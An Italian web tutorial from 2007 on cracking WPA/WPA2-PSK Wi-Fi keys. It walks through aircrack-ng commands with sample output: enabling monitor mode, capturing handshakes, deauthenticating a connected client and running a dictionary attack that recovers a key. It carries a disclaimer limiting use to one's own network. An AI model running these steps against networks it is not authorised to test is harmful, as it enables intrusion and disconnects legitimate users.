www.WiFi-ita.com - La prima Community Italiana sul WiFi!
Transcript
www.WiFi-ita.com - La prima Community Italiana sul WiFi!
..:: www.WiFi-ita.com - La prima Community Italiana sul WiFi! ::.. ... 1 di 5 http://www.wifi-ita.com/index.php?option=com_content&task=view... www.WiFi-Ita.com | La prima community Italiana sul WiFi MENU PRINCIPALE WARDRIVING WPA CRACK HOME Supportaci: Annunci Google Scritto da drpepperONE FORUM CHAT mercoledì 12 dicembre 2007 By drpepprONE REGISTRATI! è gratis! Teoria WiFi Antenne Wireless Supportaci: Modding USB/PCMCIA/AP DATABASE Modding WiFi Mondo FON Guide sul Wardriving Area Linux Test Wireless Database Alice Key Security Wireless Notizie Collegamenti web Area DOWNLOAD Cerca nel sito Contattaci Supportaci: Video Networking Telecamere di rete AXIS Videosorveglianza, Reti Lan e Wifi www.wiringshop.com Supportaci Questa guida spiega come catturare i pacchetti handshake wpa/wpa2 psk per potere attivare il bruteforce dictionary attack. INTENDO RICORDARE CHE ENTRARE IN UNA RETE PROTETTA E' UN REATO PRESEGUIBILE A TERMINI DI LEGGE, RAGION PER CUI QUESTA GUIDA E' DA RIFERIRSI A UNA PROVA SULLA PROPRIA RETE, AL FINE DI GIUDICARNE LA SICUREZZA. WIFI-ITA.COM E GLI AMMINISTRATORI NON POTRANNO ESSERE RITENUTI RESPONSABILI DI EVENTUALI VIOLAZIONI EFFETTUANDO UN USO ERRATO DI QUESTA GUIDA. Vedere la NORMATIVA sul Wireless. Saluti da drpepprONE A tutt'oggi l'unico modo per poter recuperare una chiave wpa/wpa2 psk è usare un bruteforce dictionay attack, ovvero un attacco di tipo dizionario che prova in modo sequenziale tutte le password presenti in un file dizionario.Nell'attesa che venga scoperta una possibile vulnerabilità del WPA/WPA2 psk, vediamo come procedere. Attenzione!!! Questo metodo funziona solo con wpa/wpa psk ovvero con metodo di autenticazione pre-shared keys. Se il metodo di autenticazione è diverso da PSK non sarà possibile utilizare tale procedura: Attenzione affinchè sia possibile catturare gli handshake è indispensabile e necessario che la nostra scheda wireless comunichi alla stessa velocità e nella stessa modalità del router access point. Quindi per esempio se la nostra scheda è in “B” mode e il router/AP è in “G” mode, non sarà possibile catturare gli handshake. Vale lo stesso per la velocità ad esempio 11MB, 54MB, etc. Per scoprire quale siano la modalità e la velocità corrette si può provare a cambiarele finchè gli handshake non vengono catturarti. Per verificare il rate usato dal router/Ap, avviamo kismet selezionamio il nostro router e nelle info verrà anche descritto il rate con cui esso comunica. Per cambiare il rate useremo il seguente comando: iwconfig ath0 rate [auto,11,54 etc] 05/04/2008 15.00 ..:: www.WiFi-ita.com - La prima Community Italiana sul WiFi! ::.. ... 2 di 5 http://www.wifi-ita.com/index.php?option=com_content&task=view... Per cambiare il transmission mode eseguiremo il comando: iwpriv ath0 mode 2 (dove il numero indica uno fra le seguenti modalità) NEW HEMP3CAR: Sballa la tua Auto di MP3! Mode 0 Automatic (a/b/g) Mode 1 solo 802.11a Mode 2 solo 802.11b Mode 3 solo 802.11g New Update : Se nonostante il rate di trasmeissione dalla nostra scheda di rete sia uguale a quello dell AP e non riceviamo l'handshake wpa, proviamo a settare il rate ad 1 M. In molti casi il rate ad 1 M risolve ogni problema. [iwconfig ath0 rate 1M] .::Prerequisiti:. A]Un client connesso alla rete wpa/wpa2 psk(necessario per velocizzare il processo di creazione di pacchetti handshake) B]Una scheda di rete con chipset compatibile con il packet injection in monitor mode C]La distribuzione live BACKTRACK 2 D]I dati della rete wpa/wpa2 psk (il Mac Address del router/il Mac Address del client connesso, il canale wifi usato dal router per comunicare) -.-.-.-.-.-Questa guida viene usata una scheda di rete wireless con chipset Atheros che usa i driver madwifi, che utilizzano come nome virtuale del device athX-.-.-.-.-.- 1] Avviamo la nostra interfaccia wireless in monitor mode: Verifichiamo prima con il comando iwconfig se esitono interfacce athX e in tal caso le eliminiamo: airmon-ng stop ath0 Interface wifi0 ath0 Chipset Atheros Atheros Driver madwifi-ng madwifi-ng VAP (parent: wifi0) (VAP estroyed) Lanciamo iwconfig per verificare che non ci siano più interfacce athX attive: iwconfig lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions.If there are any remaining athX Avviamo airmon-ng specificando il canale su cui il router comunica: airmon-ng start wifi0 9 Interface wifi0 ath0 Chipset Atheros Atheros Driver madwifi-ng madwifi-ng VAP (parent: wifi0) (monitor mode enabled) Per verificare che la nostra scheda sia effetivamente in monitor mode lanciamo il comando iwconfig e verifichiamo la voce "Mode" iwconfig lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point:00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 05/04/2008 15.00 ..:: www.WiFi-ita.com - La prima Community Italiana sul WiFi! ::.. ... 3 di 5 http://www.wifi-ita.com/index.php?option=com_content&task=view... Tx excessive retries:0 Invalid misc:0 Missed beacon:0 2]Avviamo airodump-ng per catturare gli authentication handshake airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w catturawpa ath0 Dove: -c 9 è il canale su cui il router/access point comunica - -bssid 00:14:6C:7E:40:80 Il MAC address del router/access point. -w catturawpa il nome del file in cui verrano salvati i dati. Ecco come si presenta airodump-ng: CH 9 ][ Elapsed: 4 s ][ 2007-11-22 16:58 BSSID PWR RXQ Beacons 00:14:6C:7E:40:80 39 100 drpepperONE BSSID STATION 51 #Data, #/s CH MB ENC CIPHER AUTH ESSID 116 14 9 54 WPA2 CCMP PSK PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116 Come vedete sopra è collegato un client. 3] Usare aireplay-ng per deautenticare il client connesso aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0 Dove: -0 è il deauthentication mode 5 è il numero di gruppi di pacchetti deauthentication da mandare -a 00:14:6C:7E:40:80 è il MAC address dell router/access point -c 00:0F:B5:FD:FB:C2 è il MAC address del client da deautenticare ath0 il nome dell'interfaccia wireless Questo è l'output del comando “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0” 12:55:56 12:55:56 12:55:57 12:55:58 12:55:58 Sending DeAuth to station Sending DeAuth to station Sending DeAuth to station Sending DeAuth to station Sending DeAuth to station -- STMAC: [00:0F:B5:FD:FB:C2] -- STMAC: [00:0F:B5:FD:FB:C2] -- STMAC: [00:0F:B5:FD:FB:C2] -- STMAC: [00:0F:B5:FD:FB:C2] -- STMAC: [00:0F:B5:FD:FB:C2] Una volta deautenticato il client, esso riproverà a riconnettersi producendo cosi pacchetti handshake. 4] Avviare aircrack-ng per recuperare la pre-shared key Per effettuare questo passo è necessario avere un file dizionario di pasword che contenga il più grosso numero possibili di password. aircrack-ng -w dizionario -b 00:14:6C:7E:40:80 catturawpa*.cap Dove: -w dizionario è il nome del file dizionario. *.cap è il l'lenco dei file di capture che abbiamo collezzionato. Opening catturawpa-01.cap Opening catturawpa-02.cap Opening catturawpa.cap Opening catturawpa.cap Read 1827 packets. No valid WPA handshakes found. In questo esempio avviando aircrack-ng non sono presenti ancora pacchetti handshake. Qui invece vi è l'esempio in cui sono presenti handshake: Opening catturawpa-01.cap Opening catturawpa-02.cap Opening catturawpa.cap Opening catturawpa.cap Read 1827 packets. 05/04/2008 15.00 ..:: www.WiFi-ita.com - La prima Community Italiana sul WiFi! ::.. ... 4 di 5 # BSSID ESSID http://www.wifi-ita.com/index.php?option=com_content&task=view... Encryption 1 00:14:6C:7E:40:80 drpepperONE WPA (1 handshake) Selezioniamo 1 per sceglere la rete interessata: E qui la schermata di aicrack alla fine quando trova la nostra chiave: Aircrack-ng 0.9 [00:00:00] 2 keys tested (37.20 k/s) KEY FOUND! [ 12345678 ] Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB Nota: Se usate la versione dev (sviluppo) di aricrack-ng e se la password da trovare contiene o un carattere speciale o una lettera maiuscola o uno spazio, aircrack-ng versione dev non riuscirà a riconoscerla. Quindi consiglio di usare sempre l'ultima versione stabile ove invece aircrack-ng riesce tranquillamente a trovare tutti i caratteri. Infatti dalla definizione degli standard wpa, la password deve essere di lunghezza minima di 8 e massima 63 caratteri stampabili della tabella ASCII: quindi una password wpa può contenere tutti i seguenti caratteri: RICORDO CHE PER INFO & AIUTI VARI, BASTA CONTATTARCI NEL NOSTRO FORUM < Prec. Pros. > 05/04/2008 15.00 ..:: www.WiFi-ita.com - La prima Community Italiana sul WiFi! ::.. ... 5 di 5 http://www.wifi-ita.com/index.php?option=com_content&task=view... [Indietro] Site_Designed_by_BigDaD 05/04/2008 15.00